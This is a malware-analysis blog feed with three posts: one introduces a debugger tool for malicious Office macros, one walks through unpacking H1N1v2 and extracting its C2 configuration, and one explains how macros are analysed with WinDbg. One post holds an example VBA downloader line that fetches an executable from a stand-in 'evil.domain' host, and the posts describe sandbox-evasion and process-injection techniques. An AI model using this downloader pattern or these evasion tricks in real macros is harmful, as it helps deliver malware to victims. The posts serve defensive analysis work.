tag:blogger.com,1999:blog-68034791475310860402024-02-19T07:29:27.220-08:00tHEMbITSPoking malicious code with sticks...Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-6803479147531086040.post-79212475576379313212016-11-21T06:27:00.000-08:002016-11-21T06:27:00.212-08:00Loffice gets a makeover - Gives an insight into antis and detect code injection<br />
There have been some time since there were any updates to loffice and frankly, there have been updates but they haven't been pushed. Mainly cause I had an initial plan which simply grew as new techniques were deployed by bad actors.<br />
<br />
The updates are in short:<br />
<ul>
<li>Better logging and reporting</li>
<li>Insight into antis</li>
<li>Evade "Recent documents" </li>
<li>Detect code injection</li>
<li>New exit mode</li>
</ul>
For those unfamiliar with loffice, read the initial post <a href="http://thembits.blogspot.se/2016/06/loffice-analyzing-malicious-documents.html">here</a>.<br />
<br />
<h4>
Better logging and reporting</h4>
For those who ran the old version, logging was simply done to stdout which required the user to scroll through enough rows to get frustrated. This have changed, a directory is created in which each run will be saved instead of stdout.<br />
<br />
Feedback will still be given on what is going on while the macro is executed as shown below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAy_LdGucCOyPmK6FfMssuo75wfI7PhZB4ii4TfTk_4L0Yg9-qF5QQUutvCdv_rr4SRCoaOeKrBMvWkirmH8fsIyB-lERtc4OZeLn5Vp40yNWzOKpUNPT6Ntt9dQWRwd29sLKa9YHi3E/s1600/reporting+feedback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAy_LdGucCOyPmK6FfMssuo75wfI7PhZB4ii4TfTk_4L0Yg9-qF5QQUutvCdv_rr4SRCoaOeKrBMvWkirmH8fsIyB-lERtc4OZeLn5Vp40yNWzOKpUNPT6Ntt9dQWRwd29sLKa9YHi3E/s400/reporting+feedback.png" width="400" /></a></div>
<br />
After a session is terminated, either manually or via the selected exit mode, loffice will output a summary on what has been going on.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N2u6s8pwJWLaNSojUmyumdvG69Duqcr3zAshCl6rSpe3g7f-KzVjAno4FrkU0S7G_BtGs0z9PHqzMCppFMwx0aZzV_hok3dGCqVxaVLPH-uGkAOrJcblGZha3x9jA5Tj-q0odbYCbag/s1600/reporting+summary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N2u6s8pwJWLaNSojUmyumdvG69Duqcr3zAshCl6rSpe3g7f-KzVjAno4FrkU0S7G_BtGs0z9PHqzMCppFMwx0aZzV_hok3dGCqVxaVLPH-uGkAOrJcblGZha3x9jA5Tj-q0odbYCbag/s400/reporting+summary.png" width="317" /></a></div>
<br />
A complete picture is available in the log located in the "logs" directory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWH262GBpH_t3C3OQwWb8Dz9QjtdGCwzxVTfOi56EfwZi2tEggTUkKbTbofsnPIJ8e-ULLmxDPiB7CcZIy_fR6KqH5zDaQBiLLbGiUFtRqU3ttcTPuOzuF2httj4EhKoIC_3WXkUE3QS0/s1600/reporting+logfile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWH262GBpH_t3C3OQwWb8Dz9QjtdGCwzxVTfOi56EfwZi2tEggTUkKbTbofsnPIJ8e-ULLmxDPiB7CcZIy_fR6KqH5zDaQBiLLbGiUFtRqU3ttcTPuOzuF2httj4EhKoIC_3WXkUE3QS0/s320/reporting+logfile.png" width="307" /></a></div>
<br />
This is what was shown in the console in the old version. Also, the images above show an example on how it will look if loffice detect that code injection is going on. More on this further down.<br />
<br />
<h4>
Insight into antis</h4>
This have been one of the more interesting features to add. In the old version loffice could battle antis by patching WMI queries for example, in this version it will give an insight or hint if you will, rather than patching and trying to bypass anti-analysis attempts.<br />
<br />
The number of antis deployed and can be deployed are simply huge, but a common denominator between a large number of them are to detect strings within strings. This can for example be checking if the document name contains the string <i>"malwr_"</i>, <i>"malware"</i> or <i>".bin"</i>. One of the functions used to check this is via<i> </i>the VBA function <a href="https://msdn.microsoft.com/en-us/library/8460tsh1(v=vs.90).aspx">InStr</a>. As the function where strings could easily be extracted on comparison wasn't exported I needed to locate the function statically regardless of the VBA DLL (vbe7.dll). This was done with <a href="https://github.com/erocarrera/pefile">pefile</a> and <a href="http://www.capstone-engine.org/">capstone</a>.<br />
<br />
The result of this is that it's now possible to see if the macro is trying to profile the machine it's running on. The below image show the result of a malicious document being able to detect VMware Tools.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUD07RTQp0fpYrIDW1FKAI_kxc0zpI857_UZHCimksi4J-leCGU5TgY1hI1lI7XcVAeFwWctHdmTAchMSfhef2woAp6fLsut0rWaHylZw_2L6BNnXVK0EasZ1xTfi6h0B8pPFNwHqN_0/s1600/instr+detected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUD07RTQp0fpYrIDW1FKAI_kxc0zpI857_UZHCimksi4J-leCGU5TgY1hI1lI7XcVAeFwWctHdmTAchMSfhef2woAp6fLsut0rWaHylZw_2L6BNnXVK0EasZ1xTfi6h0B8pPFNwHqN_0/s400/instr+detected.png" width="291" /></a></div>
<br />
So if no malicious activity is noted be sure to check the last lines of the log for hints on why there wasn't any malicious actions.<br />
<br />
<h4>
Evade "Recent documents"</h4>
One of the earlier tricks of detecting sandboxes was to check the number of recently opened documents. If it was under a certain value the macro would fail.<br />
<br />
Loffice will check this on start by counting the number of entries from the registry. Should it find that there are less than three items it will suggest adding a random number of documents with random names so that it would seem that there have been more activity that it actually have. This will be done for the whole Office suite (Word, PowerPoint and Excel).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7YerefKhnRuAhLBAnAfe2Z7NKi-MDtLmgZuxLOPTfoie9JUPJau-wlO95j6cSNl0N8wp6EM-9Pi-r9Nyl_ssuYO68IxH-xXWv9vrcBRP8om3F05SFozysKRl0VVAuaQ9SmKFSEAfUJo/s1600/recent+docs+patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7YerefKhnRuAhLBAnAfe2Z7NKi-MDtLmgZuxLOPTfoie9JUPJau-wlO95j6cSNl0N8wp6EM-9Pi-r9Nyl_ssuYO68IxH-xXWv9vrcBRP8om3F05SFozysKRl0VVAuaQ9SmKFSEAfUJo/s400/recent+docs+patch.png" width="400" /></a></div>
<br />
<br />
Even though Word never been launced, loffice will add recent files and make it look it has been "used".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IsZtyeRzPzdykguLsOlIJi1_gN91a3zI3xoMK_kp7Y4zAvzItlQ3BT1CinaYRhs09UCGwLkzUTqkVDm-nifXP8MuGJYg8BWrx_Sjp5nbm-7YJ77l11sXpYXnaUFlYR9kUp0NcYBRiGU/s1600/recent+docs+list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IsZtyeRzPzdykguLsOlIJi1_gN91a3zI3xoMK_kp7Y4zAvzItlQ3BT1CinaYRhs09UCGwLkzUTqkVDm-nifXP8MuGJYg8BWrx_Sjp5nbm-7YJ77l11sXpYXnaUFlYR9kUp0NcYBRiGU/s320/recent+docs+list.png" width="275" /></a></div>
<br />
<h4>
New exit mode & detecting code injection</h4>
This was one of the techniques I was simply waiting for in the wild; macros that use shellcode to perform RunPE-like operations.<br />
<br />
When injecting a PE to a remote process there are a couple of things that needs to be done such as writing memory to the remote process, setup thread context and resume the remote suspended thread. These steps are used to increase a counter <i>inject </i>which will be used to determine if loffice should exit when the <i>ZwResumeThread </i>is called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFzu-jfvQPfLrOb-CiZimByiRmwH8gZeWTcVJr0DG8n1sBZVk721SypUOl-1IxfGxKIZiy-KJ8599Zu6t1kyziOZdP6ev2RFV9jdwNkTrIZb9LmuDPlVFPFLH_WtER1Lt6JTQNMbg6yOk/s1600/inject+summary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFzu-jfvQPfLrOb-CiZimByiRmwH8gZeWTcVJr0DG8n1sBZVk721SypUOl-1IxfGxKIZiy-KJ8599Zu6t1kyziOZdP6ev2RFV9jdwNkTrIZb9LmuDPlVFPFLH_WtER1Lt6JTQNMbg6yOk/s400/inject+summary.png" width="288" /></a></div>
<br />
In the above image the summary loffice have noted that a suspended process has been created and that the "inject" threshold is above 2 which result in termination upon calling <i>ZwResumeThread</i>. A reminder will be displayed that the suspended process is still "running" which means that the injected data can be retrieved. Depending on the data written, the log file might reveal where to look:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc0QIhHaPtam4KQMvRHJkuyd0Mli0xc8CTOBFgWET5PEn82PEwX3nPcl586laGWPrxN78NtYkHRo-zHtLLVD8IRfovc-WwyzLmyW-UaXdwLfTjZWXYXrtBuWQrDaHGb3QOrdIaohG0jpg/s1600/inject+log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc0QIhHaPtam4KQMvRHJkuyd0Mli0xc8CTOBFgWET5PEn82PEwX3nPcl586laGWPrxN78NtYkHRo-zHtLLVD8IRfovc-WwyzLmyW-UaXdwLfTjZWXYXrtBuWQrDaHGb3QOrdIaohG0jpg/s400/inject+log.png" width="400" /></a></div>
<br />
<h4>
Comments</h4>
Hopefully loffice have come to be more useful and user friendly than before. I have had sessions where loffice failed to set breakpoints (winappdbg issue) so be sure to run this in a VM. The issue can be spotted if you get a "RuntimeWarning", all the breakpoints for that particular module will not be set. This have been very random.<br />
<br />
<br />
This version will be the end of the current layout, I will make it more configurable in the future, mainly to make it easy for anyone to contribute and make it modular. As always, if you have comments, suggestions or anything else, let me know.<br />
<br />
The code is available on <a href="https://github.com/tehsyntx/loffice">Github</a>. As the project have outgrown itself, the quality of the code have gone the same way, re-work will be done, promise :)Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-2393063405918192016-07-22T11:11:00.002-07:002016-11-20T11:56:42.854-08:00Analyzing H1N1v2: Battle injection and dynamic imports in search of configsWhile analyzing H1N1v2 I found myself using some methods that I can't remember having read about anywhere in terms of analysis, so I figured I might as well do a short write-up about it. Nothing revolutionary, but hopefully useful. A summary on H1N1v2 itself can be found on <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3851#p28028">Kernelmode</a> and analysis results have been published by <a href="https://www.arbornetworks.com/blog/asert/wp-content/uploads/2015/06/blog_h1n1.pdf">Arbor</a>.<br />
<br />
<br />
<h4>
Getting imports</h4>
As stated in the post above, the loader consist of two parts, the loader responsible for loading the second part, the actual payload responsible for communicating with the C2 server and perform any tasks retrieved from the C2 server. The sample used can be found on <a href="https://malwr.com/analysis/MTg4N2MyNmUwM2FiNDc3OGJhY2Q1NTQyOTQxOGM5OGM/">Malwr.</a><br />
<br />
H1N1 is "crypted" and can be found in the resource section, XOR-encoded using a key <i>ZIOUFAIOjf</i>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMKNmVuuuICC-bdnLy-Xawy6X8ck_vEr46I_4TgX8uYsx4RSmKcrUiZdMM7YZ4xsgjHm2UTIAx6AuCCNF0qFUBVVt7a_ykd875wB_WF-qjFODnzc2-dbtJYfXDYrZDKiv9OoRVnMRR_Lc/s1600/h1n1-crypt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMKNmVuuuICC-bdnLy-Xawy6X8ck_vEr46I_4TgX8uYsx4RSmKcrUiZdMM7YZ4xsgjHm2UTIAx6AuCCNF0qFUBVVt7a_ykd875wB_WF-qjFODnzc2-dbtJYfXDYrZDKiv9OoRVnMRR_Lc/s400/h1n1-crypt.png" width="400" /></a></div>
<br />
<br />
Static analysis of the "uncrypted" executable show that their isn't a import section. This by itself is suspicious and suggest that imports are resolved at runtime, making static analysis hard.<br />
<br />
H1N1 resolves all imports for each module; first imports from kernel32 and then ntdll. The imports themselves are resolved by hash which eliminates the need for strings. Getting the base address for the modules are also resolved by hash.<br />
<br />
The functions for getting the base address is the first call in the "main" function. The value moved to EBX just before the call looks very similar to a hash-like value, and inspecting the function confirms that this is indeed a "resolve by hash" function.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-R-uOcQd32MdlEk_KAGN1TG4GDPYyMAmXI73Nw-lTJrf1abXDMTpf4JlxH_m91-fjX0YsDSr90T3i9DNKvRu1prAwrzCZksn-umGL2MFNKv1EnhTUQTRdRCg549tQbhr7HxlHAKsrZg/s1600/main.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-R-uOcQd32MdlEk_KAGN1TG4GDPYyMAmXI73Nw-lTJrf1abXDMTpf4JlxH_m91-fjX0YsDSr90T3i9DNKvRu1prAwrzCZksn-umGL2MFNKv1EnhTUQTRdRCg549tQbhr7HxlHAKsrZg/s400/main.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-mec-SRp-4J4dhvWKl4-pKW9rLv3unIQTgg3mjrGtKgHspSbZbolsctDKpBiZZGq3xHkQ-2eUw0CpThYbvwkcd-ganXSA13RWYpv7ZZFPVUSudlqgO32_VHB3D5e3VBT1V24IMu674c/s1600/resolve_base.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-mec-SRp-4J4dhvWKl4-pKW9rLv3unIQTgg3mjrGtKgHspSbZbolsctDKpBiZZGq3xHkQ-2eUw0CpThYbvwkcd-ganXSA13RWYpv7ZZFPVUSudlqgO32_VHB3D5e3VBT1V24IMu674c/s400/resolve_base.PNG" width="290" /></a></div>
<br />
<br />
<br />
Before the next function is called, ESI and EDI have addresses moved to them, these are pointers to the destination IAT and an array of hashes that represent the imports to be resolved.<br />
<br />
So it's resolving imports, and? As the original executable don't have imports on disk, static analysis would be a problem that much is clear. However since H1N1 resolves all the imports for each module it's possible to dump the imports to disk after they have been resolved. This would enable much faster static analysis and identifying interesting functions.<br />
<br />
The weapon of choice is ImpRec. Using the "IAT Autosearch"-function would yield nothing which means that we must manually located the IAT which can be done by following any of the resolved imports in memory. Using the RVA from the IAT ImpRec is able to find the resolved imports, although with quite some invalid thunks.<br />
<br />
By cutting away the invalid thunks (<i>Show invalid</i>) the result will be something like:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP6VwCSpokGbymU2Q2F6D5vG6Jh9F7L8Vaoq65qgJ2bTxX30pGF3upwxqgEhaYYCr92p4hpDX77lesiheibtDBABkVjasPX3Qvk2s9Qs44qmBq-eg-fcDzGQXuY8nNftfOnABp4xKyq4/s1600/imprec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP6VwCSpokGbymU2Q2F6D5vG6Jh9F7L8Vaoq65qgJ2bTxX30pGF3upwxqgEhaYYCr92p4hpDX77lesiheibtDBABkVjasPX3Qvk2s9Qs44qmBq-eg-fcDzGQXuY8nNftfOnABp4xKyq4/s400/imprec.PNG" width="400" /></a></div>
<br />
<br />
After fixing the original file with the imports the executable can be opened in IDA and the code will become much more easy to analyze.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTtj15FSuK6gmTnqZpKrZ2_lT4EJ12n7R1zIGH7bFpiBOuwzTew2rdmC9y_t842nA4a1EVIObM7s0YtLA7prsMzNEaP6kkPH1yOoN7iMc1OaruRdNrarx98lOa2h2e6Vn-8Xg09Yg6R80/s1600/impfix.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTtj15FSuK6gmTnqZpKrZ2_lT4EJ12n7R1zIGH7bFpiBOuwzTew2rdmC9y_t842nA4a1EVIObM7s0YtLA7prsMzNEaP6kkPH1yOoN7iMc1OaruRdNrarx98lOa2h2e6Vn-8Xg09Yg6R80/s400/impfix.PNG" width="203" /></a></div>
<br />
<br />
This technique will be re-used later on when the final payload is retrieved. Up to this point the loader-part of H1N1 can be analyzed statically using IDA. I won't go into detail on how it works in this post.<br />
<br />
<br />
<h4>
Battle process injection</h4>
<h4>
</h4>
The loader is responsible for injecting its payload into another process, namely explorer.exe in this case. The loader creates a new suspended process and creates a new shared section which holds the payload code. Before the section is mapped into explorer.exe the loader will write code to the entrypoint, this is an excellent place to manipulate the code to make sure that we don't lose control over execution when the process is allowed to continue.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4G8URGPBE6mziZatFcjoWpGeZ91FBs-eNlq5wdZa8BHNJcOuVjqkDFfNrOFwvfwXGCqXtYI47xTee41FrRI27aC4MFq_DQtegPfAgOej-ejRklGcPrva6EvWm7ZSZwFSHCOe33YZJZ0c/s1600/copy-payload.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4G8URGPBE6mziZatFcjoWpGeZ91FBs-eNlq5wdZa8BHNJcOuVjqkDFfNrOFwvfwXGCqXtYI47xTee41FrRI27aC4MFq_DQtegPfAgOej-ejRklGcPrva6EvWm7ZSZwFSHCOe33YZJZ0c/s400/copy-payload.PNG" width="400" /></a></div>
<br />
<br />
To be able to control the execution inside explorer.exe after the loader calls ResumeThread, a pause is needed, this can be done a couple of different ways, I've opted for the "EB FE"-approach (jump-to-self).<br />
<br />
Before the code is copied it needs to be patched which can be done by following ESI (pointing to the source) and patching the two first bytes with EB FE. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZqJ195KJ6phgRm3eU5YcXlbOFcjann0voNU5t4GmICJuSdDxMNObDumDTf4alzWM2vLU4iG9UT4cingpqTo8OWr9zOsAm7FT8xj03hAt9uSvkfRyfCtHZIEiwrxeUz8c4D-cnClEd-Y/s1600/injection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZqJ195KJ6phgRm3eU5YcXlbOFcjann0voNU5t4GmICJuSdDxMNObDumDTf4alzWM2vLU4iG9UT4cingpqTo8OWr9zOsAm7FT8xj03hAt9uSvkfRyfCtHZIEiwrxeUz8c4D-cnClEd-Y/s400/injection.PNG" width="400" /></a></div>
<br />
<br />
The result would be that explorer will enter an infinite loop after ResumeThread is called. By attaching to the explorer process and replacing "EB FE" with the original two bytes we now have control over the execution of the injected code. The first thing that will happen is again that the base address for kernel32 will be located and imports resolved, the interesting part in this code is a couple of instructions further down from the entrypoint.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisgw1zIowDCSDgAFOi_Aug0WE48LasWQpsZ_Wzk-voNMVIRVUl2ntV7OV7EOy1176J_7tC7keYwF1IJG5J5ItiOx0b8RdZkjrNTBtLWl4e852HNZIn4-8VzMjRJQk7MqFNE3Ja6Sr1BM4/s1600/decode-loop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisgw1zIowDCSDgAFOi_Aug0WE48LasWQpsZ_Wzk-voNMVIRVUl2ntV7OV7EOy1176J_7tC7keYwF1IJG5J5ItiOx0b8RdZkjrNTBtLWl4e852HNZIn4-8VzMjRJQk7MqFNE3Ja6Sr1BM4/s400/decode-loop.PNG" width="400" /></a></div>
<br />
<br />
This is a loop that will decode something using simple XOR. Following EDI when entering the loop will show the progress as the loop executes. The end result is an executable which is the payload of H1N1.<br />
<br />
<br />
<h4>
Fix payload IAT and decode strings</h4>
<h4>
</h4>
After unpacking the Upack layer the entrypoint is again very familiar. As this is the actual payload, there will more than just imports from kernel32 and ntdll as there need to be imports used to communicate with the C2 server. Therefore there is some work to be done.<br />
<br />
After having resolved the imports from kernel32 there is one import that is of special interest namely LoadLibraryA, without having a specific module loaded the imports can't be resolved. So a good idea is to fix the imports for the current state (after kernel32 imports have been resolved) and look up xrefs in IDA for LoadLibraryA which gives an idea where to look:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnXhpph0Yk3OgjlJnLVb_bWUcq6IMayyLV_BGTBWS4eCTVuvmvts6ZLyHVgZy9P5VV7sfkxMcbDsuaTax6ck2N7b2ZfE4OjH7B78Cfvy6J2XP4vEtr1EftufNYRlPmDdDQNPwStjTVQuE/s1600/load_lib_xrefs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnXhpph0Yk3OgjlJnLVb_bWUcq6IMayyLV_BGTBWS4eCTVuvmvts6ZLyHVgZy9P5VV7sfkxMcbDsuaTax6ck2N7b2ZfE4OjH7B78Cfvy6J2XP4vEtr1EftufNYRlPmDdDQNPwStjTVQuE/s400/load_lib_xrefs.PNG" width="400" /></a></div>
<br />
<br />
<br />
One function stands out, and looking at this function in IDA would reveal that there are not only a number of calls to LoadLibraryA but also calls to a function that resolves imports for each loaded module. One way to go about this would be to backtrack how execution ends up at this place, however, as the function doesn't have any dependencies from arguments passed upon being called, it can be called directly <br />
<br />
So after having resolved kernel32 imports, a new origin can be set at the first instruction and the function can be executed until it returns. Several modules will be loaded and imports be resolved. At this point the IAT can be dumped from memory using the same approach as earlier which would give us a chance to make sense of the code in IDA.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihRgwqlVaygb4oGf9OjDFfBrkPbhS6TTH1ZdirxAnclcKQ64bjNfVcqre1prsq54K56DUxL-Hw7DyLGlHfBfhvN2dSVfELr2Ndhp76ZeXIFyJ6Wj7OSjnBVJe5x503fWHKtWTxNLenFQ/s1600/imports.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihRgwqlVaygb4oGf9OjDFfBrkPbhS6TTH1ZdirxAnclcKQ64bjNfVcqre1prsq54K56DUxL-Hw7DyLGlHfBfhvN2dSVfELr2Ndhp76ZeXIFyJ6Wj7OSjnBVJe5x503fWHKtWTxNLenFQ/s400/imports.PNG" width="146" /></a></div>
<br />
<br />
<br />
At this point there is enough to get an understanding of the execution flow and what the different functions does in the payload. After following some imports and strings I end in a function that decode kind of a long string, well actually two strings. The beauty here is that the same technique can be used to decode the string as resolving the external imports, setting a new origin that is.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1NQ-4KWzKTLrvfAaNcBPXfifH_ljh-HswgfxI6szdgWUpHRSArYNqQk8_i212IFYafPdVwaJnnnkZNiIXuGlNskRY4yPN3Dby17oj0lzrj9wtuCDV1iJpM2qRpWWu8HLP6dgbnJTnNI/s1600/decode-strings.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1NQ-4KWzKTLrvfAaNcBPXfifH_ljh-HswgfxI6szdgWUpHRSArYNqQk8_i212IFYafPdVwaJnnnkZNiIXuGlNskRY4yPN3Dby17oj0lzrj9wtuCDV1iJpM2qRpWWu8HLP6dgbnJTnNI/s400/decode-strings.PNG" width="121" /></a></div>
<br />
<br />
<br />
As VirtualAlloc will allocate the memory used for decoding the strings, the allocated memory can be followed during the execution which would give not only the C2 servers but also the encryption key:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FlKifEv5OyWwaCJup7XH0Uq7NBqaKebt9iYn_PmcckANzRVaVaLpEiIaFyktvHiya2ENqbhMKWXKsGyLTPZaWJebvdjQRUmOWr6-vFZXukvHKHQbRulOj3lwi7viAT0sOBPH2wVDCVM/s1600/conf.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FlKifEv5OyWwaCJup7XH0Uq7NBqaKebt9iYn_PmcckANzRVaVaLpEiIaFyktvHiya2ENqbhMKWXKsGyLTPZaWJebvdjQRUmOWr6-vFZXukvHKHQbRulOj3lwi7viAT0sOBPH2wVDCVM/s320/conf.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>The destination address of the encryption key was changed to show both in the same image.</i></td></tr>
</tbody></table>
<br />
<br />
<h4>
Summary</h4>
<h4>
</h4>
H1N1 presents some interesting challenges while trying to find the config and non the less all the steps which are required to get to this point. This post is a combination of analysis findings but also a hint of tricks that can be used to get a better understanding of malware that is obfuscating for example imports and strings. When it comes to strings I highly recommend reading the article on analyzing Dridex by <a href="https://www.malwaretech.com/2016/04/lets-analyze-dridex-part-2.html">MalwareTech</a>.<br />
<br />
Again, H1N1 have been analyzed previously and published by Arbor, however, I wanted to shed some light on how the results could be achieved but also how to handle dynamic imports and process injection.Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-70163560190007915842016-06-05T16:18:00.000-07:002016-11-21T06:28:14.071-08:00Loffice - Analyzing malicious documents using WinDbg<h4>
</h4>
<h4>
</h4>
<i><b>UPDATE: </b></i>An updated version of loffice is available, details on the update is available <a href="https://thembits.blogspot.com/2016/11/loffice-gets-makeover-gives-insight.html">here</a>. <br />
<br />
I found myself doing analysis of a larger number of malicious Office documents and Javascript "documents". And since the only thing I needed from them was the payload URL the manual analysis needed had to be automated to make it more efficient.<br />
<br />
In the beginning I deobfuscated the documents by hand with some scripting included, but having seen the same type of documents over and over again I found myself just running the macro and extract the URL from memory. Still, there was too much manual work than I thought was needed, thinking that there must be a better, more controllable way.<br />
<br />
Now, the result of this isn't really a new framework or package like <a href="https://github.com/decalage2/oletools">oletools</a>, rather I'm taking a different approach than doing analysis on the file itself while putting obfuscation out of play. This is inspired by dynamic analysis and debugging of regular malware executables.<br />
<br />
<br />
<h4>
Analysis beyond the document</h4>
VB-macro and Javascript can make use of for example MSXML2.XMLHTTP to interact with remote resources, this happens on a higher level compared to using WinAPI.<br />
<br />
<code>
httpObject = CreateObject("MSXML2.XMLHTTP")<br />
httpObject.Open "GET", "http://evil.domain/1.exe", False<br />
httpObject.send()<br />
</code>
<br />
<br />
The above is very simple but all of the magic responsible for making an actual HTTP-request is done behind the scenes. One of the things that is done is break down the URL in it's base components such as hostname and path before it can be used by Windows internal functions in for example WinInet.<br />
<br />
MSXML2.XMLHTTP is built upon the URLmon which rely on WinInet. WinInet have a function for "cracking" a URL to its base components called <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384376(v=vs.85).aspx">InternetCrackUrl</a>. So before a URL is retrieved it needs to be cracked which result in that any obfuscation plays a much smaller roll in the analysis as the deobfuscation takes place before InternetCrackUrl is called.<br />
<br />
So rather than attacking the document at a script-level, we're attacking it on a lower level with a debugger. Lets look at an example how this works in practice.<br />
<br />
WinDbg is the weapon of choice. For this example I'm using a malicious Word document from one of the Dridex campaigns. So by launching Word and attaching WinDbg and setting a breakpoint on InternetCrackUrlW it's not long before the breakpoint is hit when enabling macro inside the document.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
